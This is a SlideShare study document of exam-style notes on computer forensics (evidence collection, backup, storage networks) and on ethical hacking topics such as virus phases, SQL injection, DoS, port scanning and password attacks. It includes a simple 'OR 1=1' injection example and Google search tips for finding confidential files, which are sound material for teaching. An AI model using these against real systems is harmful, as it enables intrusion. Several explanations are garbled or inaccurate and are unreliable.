SlideShare a Scribd company logo

Ethical Hacking And Computer Forensics

Download as DOCX, PDF
S
ShanaAneevan

The document outlines key concepts in computer forensics, emphasizing the importance of artifacts, volatile evidence, and the services provided by forensic professionals such as incident response and evidence analysis. It details the rules for evidence collection and the various types of evidence, including testimonial, hearsay, and real evidence, while also comparing spyware and adware. The document also describes the data recovery process and the technologies associated with computer forensic systems used by law enforcement.

Engineering
1 of 46
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
1 Computer Forensics Part A 1. What is the role of artifacts in computer forensics? There is almost always something left behind by the attacker—be it code programs, running processes, or sniffer log files. These are known as artifacts. Never attempt to analyze an artifact on the compromised system. Artifacts are capable of anything, and you want to make sure their effects are controlled. 2. Give a brief idea about volatile evidences? Always try to collect the most volatile evidence. An example an order of volatility would be:  Registers and cache  Routing tables  Arp cache  Process table  5. Kernel statistics and modules  6. Main memory  7. Temporary file systems  8. Secondary memory  9. Router configuration  10. Network topology
2 3. Describe in detail the services offered by computer forensics? There are many services offered by computer forensic are following:  Forensic incident response  Evidence collection  Forensic analysis  Expert witness  Forensic litigation and insurance claims support  Training  Forensic process improvement i. Forensic incident response: forensics and incident response is an important part of business and law enforcement operations. ii. Evidence collection :- It having Memory dump, network status, process dump, other system information, disk images and forensic analysis done on the images not on the original disk. iii. Forensic analysis: Forensic analysis is a term for in-depth analysis, investigation whose purpose is to objectively identify and document the culprits, reasons, course and consequences of a security incident or violation of state laws or rules of the organization. iv. Expert witness: An expert witness, particularly in common law countries such as the United Kingdom, Australia, and the United States, is a person whose opinion by virtue of education, training, certification, skills or experience, is accepted by the judge as an expert. v. Forensic process improvement: The purpose of this part of the chapter is to introduce the reader to a process that will enable a
3 system administrator or information security analyst to determine the threat against their systems and networks. 4. What are the rules for evidence collection? There are five rules of collecting electronic evidence. These relate to five properties that evidence must have to be useful.  Admissible  Authentic  Complete  Reliable  Believable a. Admissible: Admissible is the most basic rule. The evidence must be able to be used in court or otherwise. Failure to comply with this rule is equivalent to not collecting the evidence in the first place, except the cost is higher. b. Authentic: If you can’t tie the evidence positively to the incident, you can’t use it to prove anything. c. Complete: It’s not enough to collect evidence that just shows one perspective of the incident. d. Reliable: The evidence you collect must be reliable. Your evidence collection and analysis procedures must not cast doubt on the evidence’s authenticity and veracity. e. Believable: The evidence you present should be clearly understandable and believable to a jury.
4 5. What is internet Security hierarchy? Information such as trade secrets, vault and authorization codes, and lock and key information are clearly of a mission critical nature, and their unintended disclosure could cause severe loss to a business or operation. Fig: Internet security hierarchy 6. What are the different types of evidences? a. Testimonial Evidence: Testimonial evidence is any evidence supplied by a witness. This type of evidence is subject to the perceived reliability of the witness, but as long as the witness can be considered reliable, testimonial evidence can be almost as powerful as real evidence. mission critical departmental private Company private public information
5 b. Hearsay: Hearsay is any evidence presented by a person who was not a direct witness. Word processor documents written by someone without direct knowledge of the incident are hearsay. Hearsay is generally inadmissible in court and should be avoided. c. Real Evidence: Real Evidence is any evidence that speaks for itself without relying on anything else. In electronic terms, this can be a log produced by an audit function—provided that the log can be shown to be free from contamination. 7. Discuss the role of artifacts in computer forensics? There is almost always something left behind by the attacker—be it code programs, running processes, or sniffer log files. These are known as artifacts. Never attempt to analyze an artifact on the compromised system. Artifacts are capable of anything, and you want to make sure their effects are controlled. 8. Compare spyware and Adware? Spyware: Spyware is computer software which is installed surreptitiously on a personal computer; it takes partial control over the user’s computer, without the user’s informed consent. Adware: Adware is any software package which automatically plays, displays, or downloads advertisements to a computer after the software is installed on it or while the application is being used.
6 Both are independent programs that can be automatically installed when you surf the internet or when you installed free software. Most adware is a spyware in a different sense than “advertising supported software,” for a different reason: it displays advertisements related to what it finds from spying on you. 9. What are the different steps in evidence collection?  Find the evidence.  Find the relevant data.  Create an order of volatility.  Remove external avenues of change.  Collect the evidence.  Document everything. a. Find the Evidence: Determine where the evidence you are looking for is stored. Use a checklist. Not only does it help you to collect evidence, but it also can be used to double-check that everything you are looking for is there. b. Find the Relevant Data: Once you’ve found the evidence, you must figure out what part of it is relevant to the case. In general, you should err on the side of over-collection, but you must remember that you have to work fast. Don’t spend hours collecting information that is obviously useless. c. Create an Order of Volatility: You know exactly what to gather, work out the best order in which to gather it. The order of volatility for your system is a good guide and ensures that you minimize loss of uncorrupted evidence.
7 d. Remove External Avenues of Change: It is essential that you avoid alterations to the original data, and prevention is always better than a cure. Preventing anyone from tampering with the evidence helps you create as exact an image as possible. e. Collect the Evidence: You can now start to collect the evidence using the appropriate tools for the job. Reevaluate the evidence you’ve already collected. You may find that you missed something important. Now is the time to make sure you get it. f. Document Everything: Your collection procedures may be questioned later, so it is important that you document everything you do. Timestamps, digital signatures, and signed statements are all important. Don’t leave anything out.
8 Part B 1. Explain the types of computer Forensics Systems?  Data duplication and preservation  Data recovery  Document searches  Media conversion  Expert witness services  Computer evidence service options  Other miscellaneous services a. Data Seizure Computer forensics experts, following federal guidelines, should act as this representative, using their knowledge of data storage technologies to track down evidence. Experts should also be able to assist during the equipment seizure process. b. Data Duplication and Preservation When one party must seize data from another, two concerns must be addressed:  the data must not be altered in any way  the seizure must not put an undue burden on the responding party. Computer forensics experts should acknowledge both of these concerns by making an exact duplicate of the needed data. When experts work on the duplicated data, the integrity of the original data is maintained. c. Data Recovery
9 Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Using proprietary tools, computer forensics experts should be able to safely recover and analyze otherwise inaccessible evidence. The ability to recover lost evidence is made possible by the expert’s advanced understanding of storage technologies. d. Document Searches Computer forensics experts should also be able to search over 200,000 electronic documents in seconds rather than hours. The speed and efficiency of these searches make the discovery process less complicated and less intrusive to all parties involved. e. Media Conversion Computer forensics experts should extract the relevant data from these devices, convert it into readable formats, and place it onto new storage media for analysis. f. Expert Witness Services Computer forensics experts should be able to explain complex technical processes in an easy-to-understand fashion. This should help judges and juries comprehend how computer evidence is found, what it consists of, and how it is relevant to a specific situation. g. Computer Evidence Service Options Computer forensics experts should offer various levels of service, each designed to suit your individual investigative needs.  Standard service
10  On-Site service  Emergency service  Priority service  Weekend service i. Standard Services Computer forensics experts should be able to work on your case during normal business hours until the critical electronic evidence is found. . ii. On-Site Service Computer forensics experts should be able to travel to their location to perform complete computer evidence services. While on-site, the experts should quickly be able to produce exact duplicates of the data storage media in question. iii. Emergency Service Your computer forensics experts should be able to give your case the highest priority in their laboratories. They should be able to work on it without interruption until your evidence objectives are met. iv. Priority Service Dedicated computer forensics experts should be able to work during normal business hours (8:00 A.M. to 5:00 P.M., Monday through Friday) until the evidence is found. Priority service typically cuts your turnaround time in half. v. Weekend Service Computer forensics experts should be able to work from 8:00 A.M. to 5:00 P.M., Saturday and Sunday, to locate the needed electronic evidence and
11 will continue working on your case until your evidence objectives are met. Weekend service depends on the availability of computer forensics experts. h. Other Miscellaneous Services Computer forensics experts should also be able to provide extended services. These services include:  Analysis of computers and data in criminal investigations  On-site seizure of computer data in criminal investigations  Analysis of computers and data in civil litigation.  On-site seizure of computer data in civil litigation  Analysis of company computers to determine employee activity  Assistance in preparing electronic discovery requests  Reporting in a comprehensive and readily understandable manner  Court-recognized computer expert witness testimony  Computer forensics on both PC and Mac platforms  Fast turnaround time. 2. Explain data recovery process? Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Many people, even computer experts, fail to recognize data recovery as an option during a data crisis, yet it is possible to retrieve files that have been deleted and passwords that have been forgotten or to recover entire hard drives that have been physically damaged. Data Back-up and Recovery  Back-up Obstacles
12 The following are obstacles to backing up applications:  Backup window  Network bandwidth  System throughput  Lack of resources i. Back-up Windows: The backup window is the period of time when backups can be run. The backup window is generally timed to occur during nonproduction periods when network bandwidth and CPU utilization are low. ii. Network Bandwidth: If a network cannot handle the impact of transporting hundreds of gigabytes of data over a short period of time, the organization’s centralized backup strategy is not viable. iii. System throughput: Three I/O bottlenecks are commonly found in traditional backup schemes. These are: 1. The ability of the system being backed up to push data to the backup server. 2. The ability of the backup server to accept data from multiple systems simultaneously. 3. The available throughput of the tape device(s) onto which the data is moved. iv. Lack of Resources: Many companies fail to make appropriate investments in data protection until it is too late. b. The Future of Data Back-up Successful data backup and recovery is composed of four key elements: the backup server, the network, the backup window, and the backup storage device.
13 a. The Back-up Server: The backup server is responsible for managing the policies, schedules, media catalogs, and indexes associated with the systems it is configured to back up. The systems being backed up are called clients. The overall performance of a backup or recovery was directly related to the ability of the backup server to handle the I/O load created by the backup process. The tape servers that allow administrators to divide the backup tasks across multiple systems while maintaining scheduling and administrative processes on a primary or backup server. This approach often involves attaching multiple tape servers to a shared tape library, which reduces the overall cost of the system. The newest backup architecture implements a server less backup solution that allows data to be moved directly from disk to tape, bypassing the backup server altogether. This method of data backup removes the bottleneck of the backup server completely. However, the performance of server less backup is then affected by another potential bottleneck—bandwidth. b. The Network Data Path: Centralization of a data-management process such as backup and recovery requires a robust and available network data path. The movement and management of hundreds or thousands of megabytes of data can put a strain on even the best-designed networks. An enterprise class backup solution can distribute backup services directly to the data source, while at the same time centralizing the administration of these resources.
14 c. The Back-up Window: A backup window defines how much time is available to back up the network. Time plays an important role in choosing how much server, network, and resource support needs to be deployed.  Incremental Back-up: Incremental backups only transfer data that has changed since the last backup. On average, no more than 5% of data in a file server changes daily. That means an incremental backup may only require 5% of the time it takes to back up the entire file system.  Block-Level Incremental Back-up: Rather than backing up entire files that have been modified since the last backup, only the blocks that have changed since the last backup are marked for backup.  Image Back-up: This type of backup creates copies, or snapshots, of a file system at a particular point in time. Image backups are much faster than incremental backups and provide the ability to easily perform a bare bones recovery of a server without loading the operating systems, applications, and the like.  Data Achieving: Removing infrequently accessed data from a disk drive can reduce the size of a scheduled backup by up to 80%.  Back-up Storage Device: the single most expensive item in a backup project is the backup storage device itself. Determining the tape format, number of tape drives, and how many slots are required is predicated on many variables. Backup windows, growth rates, retention policies, duplicate tape copies, and network and server throughputs all affect which backup storage device is best for your needs.  Recommended Back-up Features:
15 1. Data Interleaving: To back up multiple systems concurrently, the backup application must be able to write data from multiple clients to tape in an interleaved manner. 2. Remote Back-up: Many remote systems are exposed to unrecoverable data loss. 3. Global Monitoring: A robust backup application should be able to support reporting and administration of any backup system, regardless of location. 4. Performance: An enterprise backup application should be able to benchmark backup data rates exceeding one terabyte per hour. 3. What are the different computer Forensic system technologies? a. Types of military computer forensics technology  Key objectives of cyber forensics include rapid discovery of evidence, estimation of potential impact of the malicious activity on the victim, and assessment of the intent and identity of the perpetrator.  Real-time tracking of potentially malicious activity Is especially difficult when the pertinent information has been intentionally hidden, destroyed, or modified in order to elude discovery.  National Law Enforcement and Corrections Technology Center (NLECTC) work with criminal justice professionals to identify urgent and emerging technology needs.  NLECTC centers demonstrate technologies, test commercially available technologies and publish results linking research and practice.. Computer forensic experiment-2000 (cfx-2000)  CFX-2000 is an integrated forensic analysis framework.
16  The central hypothesis of CFX-2000 is that it is possible to accurately determine the motives, intent, targets, sophistication, identity, and location of cyber criminals and cyber terrorists by deploying an integrated forensic analysis framework.  The cyber forensic tools involved in CFX-2000 consisted of commercial off-the-shelf software and directorate-sponsored R&D prototypes. CFX includes Sl-Fl integration environment.  The Synthesizing Information from Forensics Investigations (SI-FI) integration environment supports the collection, examination, and analysis processes employed during a cyber-forensic investigation.  The SI-FI prototype uses digital evidence bags (DEBS), which are secure and tamperproof containers used to store digital evidence. V Investigators can seal evidence in the DEBS and use the Sl-FI implementation to collaborate on complex investigations. b. Types of law enforcement computer forensics technology  Computer forensics tools and techniques have become important resources for use in internal investigations, civil lawsuits, and computer security risk management Law enforcement and military agencies have been involved in processing computer evidence for years. Computer Evidence Processing Procedures Processing procedures and methodologies should conform to federal computer evidence processing standards.
17  Preservation of Evidence: Computer evidence is fragile and susceptible to alteration or erasure by any number of occurrences. i. Trojan horse Programs: The computer experts should be able to demonstrate his or her ability to avoid destructive programs and traps that can be planted by computer users bent on destroying data and evidence. Such programs can also be used to covertly capture sensitive information, passwords, and network logons. ii. Computer Forensics Documentation: without proper documentation, it is difficult to present findings. If the security or audit findings become the object of a lawsuit or a criminal investigation, then documentation becomes even more important. iii. File Slack: Techniques and automated tools that are used to capture and evaluate file slack should be demonstrated in a training course. iv. Data Hiding Techniques: The participants should be able to demonstrate their ability to deal with slack and should demonstrate proficiency in searching file slack, documenting their findings, and eliminating the security risk. v. E-commerce Investigations: a. Net Three Analyzer: can be used to identify past Internet browsing and email activity done through specific computers. b. Dual Purpose Programs: Programs can be designed to perform multiple processes and tasks at the same time.
18 c. Text Search Techniques: Tools that can be used to find targeted strings of text in files, file slack, unallocated file space, and Windows swap files.  Data Structure: Participants should be able to leave a training course with a good understanding of how computer hard disks and floppy diskettes are structured and how computer evidence can reside at various levels within the structure of the disk.  Data Encryption: A computer forensics course should cover, in general, how data is encrypted; it should also illustrate the differences between good encryption and bad encryption.  Matching a Diskette to a computer: specialized techniques and tools that make it possible to conclusively tie a diskette to a computer that was used to create or edit files stored on it.  Data Compression: The participant should be shown how compression works and how compression programs can be used to hide and disguise sensitive data.  Erased files: The training participant should be shown how previously erased files can be recovered by using DOS programs and by manually using data-recovery techniques.  Internet Abuse Identification and Detection: This process will focus on computer forensics issues tied to data that the computer user probably doesn’t realize exists (file slack, unallocated file space, and Windows swap files).  The Boot Process and Memory Resident Programs: The participant should be able to take part in a graphic demonstration of how the operating system can be modified to change data and destroy data at the whim of the person who configured the system. c. Types of Business Computer Forensics Technology
19 Remote Monitoring of Target Computer: Data Interception by Remote Transmission (DIRT) from Codex Data Systems (CDS), Inc. [7] is a powerful remote control monitoring tool that allows stealth monitoring of all activity on one or more target computers simultaneously from a  Remote command center.  Creating trackable electronic documents:  Theft recovery software for laptops and PCs: What Is the Real Cost of a Stolen Laptop or PC? i. The price of the replacement hardware. ii. The price of replacing the software. iii. The cost of lost production time or instruction time. iv. The loss of customer goodwill (lost faxes, delayed correspondence or billings, problems answering questions and accessing data). v. The cost of reporting and investigating the theft, filing police reports and insurance claims. vi. The cost of increased insurance. Basic Forensics Tools and Techniques  Many computer forensics workshops have been created to familiarize investigators and security personnel with the basic techniques and tools necessary for a successful investigation of Internet and computer- related crimes.  Workshop topics normally include: types of computer crime, cyber law basics, tracing email to its source, digital evidence acquisition, cracking passwords, monitoring computers remotely, tracking online activity, finding and recovering hidden and deleted data, locating stolen computers, creating trackable files, identifying software pirates, and so on. Forensics Services Available
20  Lost password and file recovery  Location and retrieval of deleted and hidden files  File and email decryption  Email supervision and authentication  Threatening email traced to source  Identification of Internet activity  Computer usage policy and supervision  Remote PC and network monitoring  Tracking and location of stolen electronic files  Honey pot sting operations  Location and identity of unauthorized software users  Theft recovery software for laptops and PCs  Investigative and security software creation  Protection from hackers and viruses (see sidebar, “Virus/Trojan/Worm Protection”). 4. Describe in detail evidence processing steps? There really are no strict rules that must be followed regarding the processing of computer evidence. The following are general computer forensics steps:  Shut down the computer.  Document the hardware configuration of the system.  Transport the computer system to a secure location.  Make bit stream backups of hard disks and floppy disks.  Mathematically authenticate data on all storage devices.  Document the system date and time.  Make a list of key search words.  Evaluate the Windows swap file.  Evaluate file slack.  Evaluate unallocated space (erased files).
21  Search files, file slack, and unallocated space for keywords.  Document file names, dates, and times.  Identify file, program, and storage anomalies.  Evaluate program functionality.  Document your findings.  Retain copies of software used. a. Shut down the computer: Depending on the computer operating system, this usually involves pulling the plug or shutting down a network computer using relevant commands required by the network involved. Generally, time is of the essence, and the computer system should be shut down as quickly as possible. b. Document the Hardware Configuration of the System: Before dismantling the computer, it is important that pictures are taken of the computer from all angles to document the system hardware components and how they are connected. Labeling each wire is also important, so that it can easily be reconnected when the system configuration is restored to its original condition at a secure location. c. Transport the Computer System to a Secure Location: a seized computer left unattended can easily be compromised. Don’t leave the computer unattended unless it is locked up in a secure location. d. Make bit stream backups of hard disks and floppy disks: All evidence processing should be done on a restored copy of the bit stream backup rather than on the original computer. Bit stream backups are much like an insurance policy and are essential for any serious computer evidence processing. e. Mathematically authenticate data on all storage devices: You want to be able to prove that you did not alter any of the evidence after the
22 computer came into your possession. Since 1989, law enforcement and military agencies have used a 32-bit mathematical process to do the authentication process. f. Document the system date and time: If the system clock is one hour slow because of daylight-savings time, then file timestamps will also reflect the wrong time. To adjust for these inaccuracies, documenting the system date and time settings at the time the computer is taken into evidence is essential. g. Make a list of key search words: It is all but impossible for a computer specialist to manually view and evaluate every file on a computer hard disk drive Gathering information from individuals familiar with the case to help compile a list of relevant keywords is important. Such keywords can be used in the search of all computer hard disk drives and floppy diskettes using automated software. h. Evaluate the Windows swap file: The Windows swap file is a potentially valuable source of evidence and leads. When the computer is turned off, the swap file is erased. But the content of the swap file can easily be captured and evaluated. i. Evaluate file slack: It is a source of significant security leakage and consists of raw memory dumps that occur during the work session as files are closed. File slack should be evaluated for relevant keywords to supplement the keywords identified in the previous steps. File slack is typically a good source of Internet leads. j. Evaluate unallocated space (erased files): Unallocated space should be evaluated for relevant keywords to supplement the keywords identified in the previous steps.
23 k. Search files, file slack, and unallocated space for keywords: The list of relevant keywords identified in the previous steps should be used to search all relevant computer hard disk drives and floppy diskettes. It is important to review the output of the text search utility and equally important to document relevant findings. l. Document file names, dates, and times: From an evidence standpoint, file names, creation dates, and last modified dates and times can be relevant. The output should be in the form of a word processing- compatible file that can be used to help document computer evidence issues tied to specific files. m.Identify file, program, and storage anomalies: Encrypted, compressed, and graphic files store data in binary format. As a result, text data stored in these file formats cannot be identified by a text search program. Manual evaluation of these files is required and, in the case of encrypted files, much work may be involved. n. Evaluate program functionality: Depending on the application software involved, running programs to learn their purpose may be necessary. When destructive processes that are tied to relevant evidence are discovered, this can be used to prove willfulness. o. Document your findings: it is important to document your findings as issues are identified and as evidence is found. Documenting all of the software used in your forensic evaluation of the evidence, including the version numbers of the programs used, is also important. p. Retain copies of software used: as part of your documentation process, it is recommended that a copy of the software used be included with the output of the forensic tool involved. Duplication of results can be
24 difficult or impossible to achieve if the software has been upgraded and the original version used was not retained. 5. How SAN (Storage Area Networks) makes a role in Computer Forensics? SANs are a relatively new methodology for attaching storage, whereby a separate network (separate from the traditional LAN) connects all storage and servers. This network would be a high-performance implementation, such as a fiber channel, that encapsulates protocols such as a small computer system interface (SCSI). These are more efficient at transferring data blocks from storage and have hardware implementations offering buffering and delivery guarantees. This is not available using TCP/IP. SANs promise the ability to make any-to-any connections among multiple servers and storage devices. They can create a shared “pool” of storage that can be accessed by multiple servers through multiple paths, resulting in higher availability— especially during a network disaster recovery (NDR). SANs also promise to simplify backup procedures. Tape subsystems could still be shared among numerous servers during backups—all transparent to the user. In other words, SANs allow distributed servers to access a large centralized storage subsystem for data-sharing applications during an NDR.  SAN Benefits: A SAN provides a perfect environment for clustering that can extend to dozens of servers and storage devices—all the while having redundant links in a fibre channel fabric. Servers will continue to function because their data is still available through the SAN, even if storage devices fail during an NDR.
25  Centralized Management: When a disk or controller fails in a direct-attached environment, redundant systems keep the redundant array of independent (or inexpensive) disks (RAID) array operating normally and generate an alarm. However, the redundant component may fail as well, bringing the system down if the failed component isn’t replaced quickly. ..  Scalability: A storage area network can lower acquisition and expansion costs, in addition to lowering management costs. Even as new servers, disk arrays, and tape subsystems are added, the SAN architecture supports access between all servers and all storage resources in the network. Without disrupting data access, customers can add storage resources and even servers online.  Reliability: A SAN is a network that resides between the host bus adapter and the storage device. This position inherently creates a critical point at the physical level, but by implementing multiple paths and redundant infrastructure devices, the SAN reduces or eliminates single points of failure.  Performance: In application environments that depend on bulk data transfer (such as data warehousing and data-mining applications), maximum bandwidth is of particular interest. Backup and restore times can be shortened dramatically by the high channel speed and low latency obtained by using a SAN.
26 6. What is data recovery? Explain the role of backup in data recovery? Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Many people, even computer experts, fail to recognize data recovery as an option during a data crisis, yet it is possible to retrieve files that have been deleted and passwords that have been forgotten or to recover entire hard drives that have been physically damaged. The Role of Back-up in Data Recover Many factors affect back-up:  Storage costs are decreasing: The cost per megabyte of primary (online) storage has fallen dramatically over the past several years and continues to do so as disk drive technologies advance.  Systems have to be online continuously: Because systems must be continuously online, the dilemma becomes that you can no longer take files offline long enough to perform backup.
27  The role of backup has changed: The role of backup now includes the responsibility for recovering user errors and ensuring that good data has been saved and can quickly be restored. Conventional Tape Back-up Inn Today’s Market  A typical tape management system consists of a dedicated workstation with the front-end interfaced to the network and the backend controlling a repository of tape devices. The media server runs tape management software. It can administer backup devices throughout an enterprise and can run continuous parallel backups and restores.  An alternative to tape backup is to physically replicate or mirror all data and keep two copies online at all times. Because the cost of primary storage is falling, this is not as cost-prohibitive as it once was. The advantage is that the data does not have to be restored, so there are no issues with immediate data availability.  Network Back-up: Network backup creates network performance problems. Using the production network to carry backup data, as well as for normal user data access, can severely overburden today’s busy network resources.  Offline Backup: Offline backup affects data accessibility. Host processors must be quiescent during the backup. Backup is not host- independent, nor is it non disruptive to normal data access.  Live Backup: Live backups allow data access during the backup process but affect performance. Many database vendors offer live backup features. The downside to the live backup is that it puts a tremendous burden on the host.  Mirroring: Mirroring doesn’t protect against user error and replication of bad data. Fully replicated online data sounds great, albeit at twice the cost per megabyte of a single copy of online data. New Architectures and Techniques are required
28  Backup at extremely high speed, with host-processor independence of the underlying file structures supporting the data, is required. Recovery must be available at the file level. The time that systems are offline for back-up must be eliminated.  Remote hot recovery sites are needed for immediate resumption of data access. Backup of critical data is still required to ensure against data errors and user errors.  To achieve effective backup and recovery, the decoupling of data from its storage space is needed.  It is necessary to develop techniques to journal modified pages, so that journaling can be invoked within the primary storage device, without host intervention.  Part of the primary storage area must be set aside for data to be backed up. This area must be as large as the largest backup block (file, logical volume, etc.) 7. Explain the working of digital Evidences with example? Digital evidence is information stored or transmitted in binary form that may be relied on in court. It can be found on a computer hard drive, a mobile phone, among other place s. Digital evidence is commonly associated with electronic crime, or e-crime, such as child pornography or credit card fraud. However, digital evidence is now used to prosecute all types of crimes, not just e-crime. For example, suspects' e-mail or mobile phone files might contain critical evidence regarding their intent, their whereabouts at the time of a crime and their relationship with other suspects. In 2005, for example, a floppy disk led investigators to the BTK serial killer who had eluded police capture since 1974 and claimed the lives of at least 10 victims.
29 Ethical Hacking Part A 1. What are the phases of viruses? a. Dormant Phase: At this stage a viruses is in its ideal stage. It gets activated by some action or event such as date, time and presence of another program. b. Propagation Phase: In this phase virus generate its copies. c. Triggery Phase: This phase activate the virus to carry out the required function. d. Execution Phase: This phase virus performs actual function which may be harmless or destructive. 2. Explain SQL injection attacks? SQL injection is an attack where the hacker makes use of invalidated user input to enter arbitrary data or SQL commands; Malicious queries are constructed and when executed by the backend database it results in unwanted results. The attacker should have the knowledge of background database and he must make use of different strings to construct malicious queries to post them to the target. For example: SELECT item name, item description FROM item WHERE item no =999. (Normal query) SELECT item name, item description FROM item WHERE item no =999 or 1=1. (Injecting an existing query)
30 3. What is Foot printing? Foot printing is a part of reconnaissance process which is used for gathering possible information about target computer system in a network. Foot printing could be both passive and active. Example: Receiving a company’s website is a passive foot printing but attempting to gain access to sensitive information, during this phase the attacker can collect following information:  Domain name  IP address  Namespace 4. How Dos attack involves hacking? Dos attack used to denial legitimate uses access to a resource such as accessing a website network emails, etc. or making it extremely slow. This type of attack is usually implemented by hitting the target resource such as web server with too many parameters or request at same time. This result in the server is failing to respond to the entire request. The effect of this can either be crashing the server of slowing them down. 5. Write a short note on spoofing? A spoofing attack happens when a malicious party successfully impersonates another user or device. Attackers typically use spoofing to gain unauthorized access to a system or to sensitive information. Spoofing attacks may also be used to launch attacks against other
31 network host or to spread malware software. There are several major types of spoofing, including:  IP address spoofing  ARP spoofing  DNS server spoofing  Email spoofing 6. What is Batch file programming? Batch file programming is a computer to do things simply by creating a bath file you can write in a single notepad and execute as a single file. How to write a batch file? Step1. Open your text editor. Batch file programming is really about writing commands. . Notepad, WordPad, etc. are some text editor. Step2: Begin writing code. The code is essentially same as what you write in the command prompt. Few commands are follows: i. Ipconfig: This present’s network information like Mac address. ii. Start [website]: This opens a specified website in your browser. iii. Rem: This is used if you want to make commands or remark in your code. iv. Pause: It is the script so; it can be read before it continuous. v. Echo: This command will display text in the command prompt. vi. %%a: This command refers to every file in a given folder.
32 Part B 1. Explain Google Hacking Methods with example? Google Hacking is the method to access information that’s publicly available, but not intended for public distribution. Using certain intelligent search techniques, one can land unexpected results on Google search page. Google hacking involves using publicly available search engines to access publicly available information that almost certainly was not intended for public distribution. The information accessed using Google Hacking:  Personal and financial info.  User ID, computer account logins, passwords.  Private, or proprietary company data.  Sensitive government information.  Flaws in websites and servers. Common Google Hacking techniques: Search using file types, keyword, and site type: Many websites and organizations store their financial, personnel, etc., data in Microsoft Excel format. So, here’s how you need to look for some sensitive information of a South African company. Don’t forget to include keywords like Confidential, Budget etc. Use stock words and phrases: Along with file types like Excel, Word, or PowerPoint, you are also advised to use stock words and phrases like do not distribute, confidential, proprietary, not for distribution, e
33 Misconfigured web servers: Very often Google contains directories that are not intended to be on the web. In Google Hacking, these servers provide a rich set of information. Numrange search: NSA describes Numrange search as one of the “scariest searches available through Google. It uses 2 number separated by 2 dots and no spaces. A user can use it with search keywords and other search options. 2. Explain any four port scanning methods? Ping Scan: The simplest port scans are ping scans. A ping is an Internet Control Message Protocol (ICMP) echo request – you are looking for any ICMP replies, which indicates that the target is alive. A ping scan is an automated blast of many ICMP echo requests to different targets to see who responds. Administrators usually disable ping either on the firewall or on the router. It’s quick and easy to turn off this functionality and make it impossible to scout the network this way. However, ping is a good troubleshooting tool, and turning it off makes tracking down network problems a little more difficult. TCP Connect: This port scanning technique is basically the same as the TCP Half-Open scan, but instead of leaving the target hanging, the port scanner completes the TCP connection. It’s not as popular a technique as the TCP Half-Open. First, you have to send one more packet per scan, which increases the amount of noise you are
34 making on the network. Second, since you complete the connection with the target, you might trip an alarm that the Half-Open scan wouldn’t. UDP: UDP is the other half of our “hallway” and some standard services – DNS, SNMP, DHCP for example – use UDP ports instead of TCP ports. When you run a UDP port scan, you send either an empty packet or a packet that has a different payload per port, depending on your use case. SYN: Any SYN-ACK responses are possible connections: an RST (reset) response means the port is closed, but there is a live computer here. No responses indicate SYN is filtered on the network. Any SYN-ACK replies are a quick way cybercriminal can find the next potential target. 3. Discuss in detail any four DOS attack techniques? a. Ping of death: The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The TCP/IP protocol allows 65,536 bytes as a Mac limit in the server. Since the data packets are larger than the server can handle, the server can freeze, reboot or crash. b. Smurf attack: This type of attack uses large amount of Internet Control Message Protocol (ICMP). Ping traffic target at an internet broadcast address. The replay IP address is spoofed to that the intended victim. Since a single internet broadcast address can support a maximum of 255 hosts. A Smurf attack amplifies a sing ping 255times. The effect of this is slowing down the network.
35 Smurf attack is an attack in which malicious user utilizes the broadcast address of vulnerable network by sending spoofed packets, resulting in the flooding of the targeted IP address. c. Buffer Overflow: A buffer gives a temporal storage location in RAM. That is; used to hold data so that the CPU can manipulate it before writing it back to the disk. Buffers are a size limit. This type of attack loads the buffer with more data that it can hold. This causes the buffer to overflow and corrupt the data it holds. Example: - Email sending with the file name that has 256 character. d. SYN attack: SYN is a short form of Synchronize. This type of data takes advantage of three way handshake to establish communication using TCP. SYN attack works by flooding the victim with incomplete SYN messages. This causes the victim machine to allocate memory resources that are never used and deny access to legitimate users. 4. Write down any four types of attacks? a. SQL Injection attack: SQL injection is an attack where the hacker makes use of invalidated user input to enter arbitrary data or SQL commands; malicious queries are constructed and when executed by the backend database it results in unwanted results. The attacker should have the knowledge of background database and he must make use of different strings to construct malicious queries to post them to the target.
36 For example: SELECT item name, item description FROM item WHERE item no =999. (Normal query) SELECT item name, item description FROM item WHERE item no =999 or 1=1. (Injecting an existing query) The types of attacks are as follows:  Error based SQL injection  Union based SQL injection  Blind SQL injection b. Dos attack(Denial of service): Dos attack used to denial legitimate uses access to a resource such as accessing a website network emails, etc. or making it extremely slow. This type of attack is usually implemented by hitting the target resource such as web server with too many parameters or request at same time. This result in the server is failing to respond to the entire request. The effect of this can either be crashing the server of slowing them down.  Flooding attack  Ping of death  Smurf attack  Buffer Overflow. c. Sniffing: Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools. Sniffers are used by networks /system administrator to monitor and troubleshoot network traffic.
37 Attackers use sniffer to capture data packets containing sensitive information such as password, account information etc. Sniffers can be hardware or software installed in the system. Types of Sniffing:  Active Sniffing: This is the process of sniffing through the switch. A sniffing is a point to point network device. The Switch regulates the flow of data between its ports by actively monitoring the Mac address on each.  Passive Sniffing: This is the process of sniffing through the hub. Any traffic that is passing through the non-switched pr unabridged network segment can be seen by all the machines on the segment. d. Password attack: One should always take care to have strong password to defend their accounts from potential hackers. A strong password has a following attributes:  Contains at least 8 characters.  A mix of letter, number and special character.  A combination of following attributes: i. Small and capital letter.  Dictionary attack: In this attack, the attacker uses a predefined list of words from dictionary and guesses the password. If the set password is weak then a dictionary attack can decode fast.
38  Hybrid dictionary attack: It uses a set of dictionary words, combined with extensions. Crunch is a word list generator where you can specific a standard character set.  Brute force attack: In brute force attack, the hacker uses all possible combination of letters, numbers, special characters and small and capital letter to break password. 5. Examine different forms of privacy attacks? Here the attacker uses various automated tools which are freely available on the internet. Some of the examples are follows: a. Trojan: Trojan is a RAT [Remote Administration Tool] which enable attacker to execute various software and hardware instructions in the target system. Two parts are there: i. Sever port: It has to been installed on the victim’s computer. ii. Client part: It is installed on attackers system this part gives complete controller over target computer. b. Key logger: They are the tools which enable attacker to record all the key strokes made by victim and send its log secretly to the attacker mails which is previously set by him. c. Spyware: Spyware utility is the malicious program that spy on the activities of the victim and pass the recorded information to the without the victims consent. Most spyware activities monitor and record the victim’s internet using habit.
